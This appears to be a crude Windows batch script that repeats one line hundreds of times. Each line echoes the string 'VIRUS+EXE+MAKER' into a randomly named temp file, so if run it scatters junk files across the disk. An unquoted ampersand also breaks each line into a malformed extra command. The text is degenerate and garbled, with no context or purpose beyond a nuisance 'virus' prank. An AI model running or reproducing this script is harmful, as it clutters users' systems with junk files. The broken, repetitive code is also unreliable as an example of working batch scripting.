echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
